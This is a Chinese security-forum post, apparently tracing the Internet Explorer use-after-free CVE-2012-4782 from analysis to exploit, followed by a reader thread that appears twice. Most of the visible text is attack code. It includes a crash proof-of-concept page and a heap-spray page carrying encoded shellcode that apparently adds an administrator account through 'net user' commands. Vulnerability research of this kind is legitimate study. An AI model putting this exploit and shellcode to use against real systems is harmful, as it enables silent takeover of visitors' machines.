[原创]CVE-2012-4782漏洞分析到EXP构造-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2012-4782漏洞分析到EXP构造

发表于: 2015-12-9 18:56 8967

[原创]CVE-2012-4782漏洞分析到EXP构造

Netfairy

2015-12-9 18:56

8967

<!doctype html>
<html>
<head>
<script>
        function helloWorld()
        {
                var e0 = null;
                var e1 = null;
                var e2 = null;
                try {
                        e0 = document.getElementById("a");
                        e1 = document.getElementById("b");
                        e2 = document.createElement("q");
                        e1.applyElement(e2);
                        alert(e1.parentNode);
                        e1.appendChild(document.createElement('button'));
                        e1.applyElement(e0);
                        e2.outerText = "";
                        e2.appendChild(document.createElement('body'));
                }
                catch(e)
                { }
                CollectGarbage();
        }
</script>
</head>
<body onload="eval(helloWorld())">
<form id="a"></form>
<dfn id="b"></dfn>
</body>
</html>

<!doctype html>
<html>
<head>
<script>
        function helloWorld()
        {
                var e0 = null;
                var e1 = null;
                var e2 = null;
                try {
                        e0 = document.getElementById("a");
                        e1 = document.getElementById("b");
                        e2 = document.createElement("q");
                        e1.applyElement(e2);
                        alert(e1.parentNode);
                        e1.appendChild(document.createElement('button'));
                        e1.applyElement(e0);
                        e2.outerText = "";
                        e2.appendChild(document.createElement('body'));
                }
                catch(e)
                { }
                CollectGarbage();
        }
</script>
</head>
<body onload="eval(helloWorld())">
<form id="a"></form>
<dfn id="b"></dfn>
</body>
</html>

e0 = document.getElementById("a");
e1 = document.getElementById("b");
e2 = document.createElement("q");

alert("button will be free!")
e2.outerText = "";
alert("button has been free!")
e2.appendChild(document.createElement('body'));

>堆喷射(spray)
>分配相同大小的对象覆盖原 button 内存

<html>
<head></head>
<body>
<script>
//堆喷射
 //Fix BSTR spec
 function alloc(bytes, mystr) {
 while (mystr.length<bytes) mystr += mystr;
 return mystr.substr(0, (bytes-6)/2);
 }

 block_size = 0x1000;
 padding_size = 0x5FC; //offset to 0x0c0c0c0c inside our 0x1000 hex block
 Padding = '';
 NopSlide = '';

 var Shellcode =
unescape('\ud231\u30b2\u8b64\u8b12\u0c52\u528b\u8b1c\u0842\u728b\u8b20\u80
12\u0c7e\u7533\u89f2\u03c7\u3c78\u578b\u0178\u8bc2\u207a\uc701\ued31\u348
b\u01af\u45c6\u3e81\u6957\u456e\uf275\u7a8b\u0124\u66c7\u2c8b\u8b6f\u1c7a%
uc701\u7c8b\ufcaf\uc701\u4b68\u6e33\u6801\u4220\u6f72\u2f68\u4441\u6844\u7
26f\u2073\u7468\u6172\u6874\u6e69\u7369\u2068\u6441\u686d\u6f72\u7075\u63
68\u6c61\u6867\u2074\u6f6c\u2668\u6e20\u6865\u4444\u2620\u6e68\u2f20\u684
1\u6f72\u334b\u3368\u206e\u6842\u7242\u4b6f\u7368\u7265\u6820\u7465\u7520
\u2f68\u2063\u686e\u7865\u2065\u6368\u646d\u892e\ufee5\u534d\uc031\u5550%
ud7ff');

 for (p = 0; p < padding_size; p++){
 Padding += unescape('ᰜ');}

 for (c = 0; c < block_size; c++){
 NopSlide += unescape('ᰜ');} //shellcode hou
 NopSlide = NopSlide.substring(0,block_size - (Shellcode.length + Padding.length));

 var OBJECT = Padding + Shellcode + NopSlide;
 OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb

 var evil = new Array();
 for (var k = 0; k < 150; k++) {
 evil[k] = OBJECT.substr(0, OBJECT.length);
 }
 alert('spray done !');
</script>
</body>
</html>

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

image1.png （162.42kb，14次下载）
image2.png （17.43kb，16次下载）
image3.png （10.04kb，10次下载）
image4.png （19.12kb，11次下载）
image5.png （43.54kb，14次下载）
image6.png （8.00kb，2次下载）
image7.png （6.33kb，2次下载）
image8.png （15.29kb，3次下载）
image9.png （12.67kb，4次下载）
image10.png （3.57kb，4次下载）
image11.png （43.46kb，4次下载）
image12.png （5.56kb，1次下载）
image13.png （5.52kb，1次下载）
image14.png （6.75kb，1次下载）
image15.png （42.65kb，2次下载）
image16.png （42.51kb，3次下载）
image17.png （12.15kb，10次下载）
image18.png （121.91kb，4次下载）
image19.png （10.68kb，2次下载）
image20.png （33.58kb，6次下载）
image21.png （20.54kb，5次下载）
image22.png （20.50kb，5次下载）

收藏・34

免费・3

支持

最新回复 (36) 1 2 ▶
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼分析的非常精彩，鼓励鼓励 2015-12-9 21:41 0
zylyy 雪币： 144 活跃值： (38) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 329 粉丝 2 关注私信	zylyy 3 楼确实很精彩。我在win7 上测试时，发现360能够检测到这种形式的攻击。不容易啊 2015-12-9 22:13 0
asdli 雪币： 81 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 161 粉丝 0 关注私信	asdli 4 楼赞顶楼主。。 2015-12-9 22:24 0
RootSuLe 雪币： 601 活跃值： (256) 能力值： ( LV11，RANK：190 ) 在线值：发帖 11 回帖 344 粉丝 4 关注私信	RootSuLe 4 5 楼赞一个.. 2015-12-10 09:10 0
binlanone 雪币： 211 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 55 粉丝 0 关注私信	binlanone 6 楼好帖，留名 2015-12-10 11:11 0
Gkey 雪币： 216 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 104 粉丝 0 关注私信	Gkey 7 楼分析的好详细 2015-12-10 11:24 0
Arcade 雪币： 100 活跃值： (328) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 117 粉丝 0 关注私信	Arcade 8 楼很详细。赞 2015-12-10 11:35 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 9 楼膜拜了............. 2015-12-10 12:35 0
红绡枫叶雪币： 1556 活跃值： (883) 能力值： ( LV9，RANK：320 ) 在线值：发帖 25 回帖 154 粉丝 9 关注私信	红绡枫叶 6 10 楼哇,这个值得学习学习 2015-12-10 19:11 0
天OO天雪币： 11 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 60 粉丝 0 关注私信	天OO天 11 楼楼主是个心细之人，为好帖顶 2015-12-10 20:37 0
Keoyo 雪币： 292 活跃值： (810) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 12 楼赞一个，最近时间好少一直没有仔细看，看到找创建和释放节点那里，其实通过poc的分析，我们可以得到一定量的信息，比如createElement就是创建节点。。利用poc信息来加快调试进程，也是果牛提到过的方法，不过x CButton也是在漏洞调试中会用到的一种方法，条条大路通罗马嘛 2015-12-11 16:16 0
artake 雪币： 180 活跃值： (1313) 能力值： ( LV4，RANK：40 ) 在线值：发帖 13 回帖 120 粉丝 1 关注私信	artake 13 楼菜鸟请教个问题：占位代码： for(var i = 0; i<0x150; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } 为什么不放在buttom释放后和使用前呢。感觉应该放在如下位置： e2.outerText = "";//buttom释放 //是不是应该放在这里啊？？？？ e2.appendChild(document.createElement('body'));//buttom再使用 2015-12-12 12:27 0
我是谁！雪币： 115 活跃值： (23) 能力值： (RANK：20 ) 在线值：发帖 45 回帖 420 粉丝 1 关注私信	我是谁！ 14 楼前排广告位出租，感谢分享！！！！！ 2015-12-12 16:09 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 15 楼 [QUOTE=artake;1405849]菜鸟请教个问题：占位代码： for(var i = 0; i<0x150; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } ...[/QUOTE] 试过，并不行。原因我不懂，估计只有逆向底层的实现才会知道吧，本菜鸟做不到啊，希望有大神来解惑 2015-12-12 16:50 0
thxiaobo 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 28 粉丝 0 关注私信	thxiaobo 16 楼心血之作，MARK 2015-12-14 23:02 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 17 楼感谢楼主分享,mark 2015-12-15 22:28 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 18 楼乐于分享，也乐于看见别人分享 2015-12-15 22:30 0
唐tianlong 雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	唐tianlong 19 楼感谢分享 2015-12-24 11:39 0
光刃雪币： 612 活跃值： (3804) 能力值： ( LV12，RANK：200 ) 在线值：发帖 68 回帖 216 粉丝 47 关注私信	光刃 3 20 楼膜拜Netfairy大牛 2015-12-24 14:31 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 21 楼为什么复制之后就变成001c001c了，是编码的问题？ 2015-12-24 17:15 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 22 楼也许。能不能详细描述一下 2015-12-24 17:21 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 23 楼没事了……复制的时候弄错了……上面那个POC是以0c0c0c0c地址来填充的把，1c1c1c1c没有填充到，用0c0c0c0c倒是可以滑…… 2015-12-25 09:24 0
Concord 雪币： 27 活跃值： (622) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 24 楼学习了-。- 刚接触漏洞的调试 2016-1-9 17:12 0
ycmint 雪币： 1149 活跃值： (888) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 25 楼把dep 加进去，不然这种常规常套，我觉得对自己也是自我满足的啦....加油，完整的攻击流程很重要，不是是完美的漏洞流程 2016-1-10 10:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Netfairy

发帖

242

回帖

530

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (36) 1 2 ▶
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼分析的非常精彩，鼓励鼓励 2015-12-9 21:41 0
zylyy 雪币： 144 活跃值： (38) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 329 粉丝 2 关注私信	zylyy 3 楼确实很精彩。我在win7 上测试时，发现360能够检测到这种形式的攻击。不容易啊 2015-12-9 22:13 0
asdli 雪币： 81 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 161 粉丝 0 关注私信	asdli 4 楼赞顶楼主。。 2015-12-9 22:24 0
RootSuLe 雪币： 601 活跃值： (256) 能力值： ( LV11，RANK：190 ) 在线值：发帖 11 回帖 344 粉丝 4 关注私信	RootSuLe 4 5 楼赞一个.. 2015-12-10 09:10 0
binlanone 雪币： 211 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 55 粉丝 0 关注私信	binlanone 6 楼好帖，留名 2015-12-10 11:11 0
Gkey 雪币： 216 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 104 粉丝 0 关注私信	Gkey 7 楼分析的好详细 2015-12-10 11:24 0
Arcade 雪币： 100 活跃值： (328) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 117 粉丝 0 关注私信	Arcade 8 楼很详细。赞 2015-12-10 11:35 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 9 楼膜拜了............. 2015-12-10 12:35 0
红绡枫叶雪币： 1556 活跃值： (883) 能力值： ( LV9，RANK：320 ) 在线值：发帖 25 回帖 154 粉丝 9 关注私信	红绡枫叶 6 10 楼哇,这个值得学习学习 2015-12-10 19:11 0
天OO天雪币： 11 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 60 粉丝 0 关注私信	天OO天 11 楼楼主是个心细之人，为好帖顶 2015-12-10 20:37 0
Keoyo 雪币： 292 活跃值： (810) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 12 楼赞一个，最近时间好少一直没有仔细看，看到找创建和释放节点那里，其实通过poc的分析，我们可以得到一定量的信息，比如createElement就是创建节点。。利用poc信息来加快调试进程，也是果牛提到过的方法，不过x CButton也是在漏洞调试中会用到的一种方法，条条大路通罗马嘛 2015-12-11 16:16 0
artake 雪币： 180 活跃值： (1313) 能力值： ( LV4，RANK：40 ) 在线值：发帖 13 回帖 120 粉丝 1 关注私信	artake 13 楼菜鸟请教个问题：占位代码： for(var i = 0; i<0x150; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } 为什么不放在buttom释放后和使用前呢。感觉应该放在如下位置： e2.outerText = "";//buttom释放 //是不是应该放在这里啊？？？？ e2.appendChild(document.createElement('body'));//buttom再使用 2015-12-12 12:27 0
我是谁！雪币： 115 活跃值： (23) 能力值： (RANK：20 ) 在线值：发帖 45 回帖 420 粉丝 1 关注私信	我是谁！ 14 楼前排广告位出租，感谢分享！！！！！ 2015-12-12 16:09 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 15 楼 [QUOTE=artake;1405849]菜鸟请教个问题：占位代码： for(var i = 0; i<0x150; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } ...[/QUOTE] 试过，并不行。原因我不懂，估计只有逆向底层的实现才会知道吧，本菜鸟做不到啊，希望有大神来解惑 2015-12-12 16:50 0
thxiaobo 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 28 粉丝 0 关注私信	thxiaobo 16 楼心血之作，MARK 2015-12-14 23:02 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 17 楼感谢楼主分享,mark 2015-12-15 22:28 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 18 楼乐于分享，也乐于看见别人分享 2015-12-15 22:30 0
唐tianlong 雪币： 6 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	唐tianlong 19 楼感谢分享 2015-12-24 11:39 0
光刃雪币： 612 活跃值： (3804) 能力值： ( LV12，RANK：200 ) 在线值：发帖 68 回帖 216 粉丝 47 关注私信	光刃 3 20 楼膜拜Netfairy大牛 2015-12-24 14:31 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 21 楼为什么复制之后就变成001c001c了，是编码的问题？ 2015-12-24 17:15 0
Netfairy 雪币： 191 活跃值： (848) 能力值： ( LV12，RANK：530 ) 在线值：发帖 29 回帖 242 粉丝 40 关注私信	Netfairy 11 22 楼也许。能不能详细描述一下 2015-12-24 17:21 0
天涯一鸿雪币： 1040 活跃值： (1293) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 440 粉丝 1 关注私信	天涯一鸿 23 楼没事了……复制的时候弄错了……上面那个POC是以0c0c0c0c地址来填充的把，1c1c1c1c没有填充到，用0c0c0c0c倒是可以滑…… 2015-12-25 09:24 0
Concord 雪币： 27 活跃值： (622) 能力值： ( LV3，RANK：30 ) 在线值：发帖 2 回帖 134 粉丝 1 关注私信	Concord 24 楼学习了-。- 刚接触漏洞的调试 2016-1-9 17:12 0
ycmint 雪币： 1149 活跃值： (888) 能力值： ( LV13，RANK：260 ) 在线值：发帖 28 回帖 893 粉丝 10 关注私信	ycmint 5 25 楼把dep 加进去，不然这种常规常套，我觉得对自己也是自我满足的啦....加油，完整的攻击流程很重要，不是是完美的漏洞流程 2016-1-10 10:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复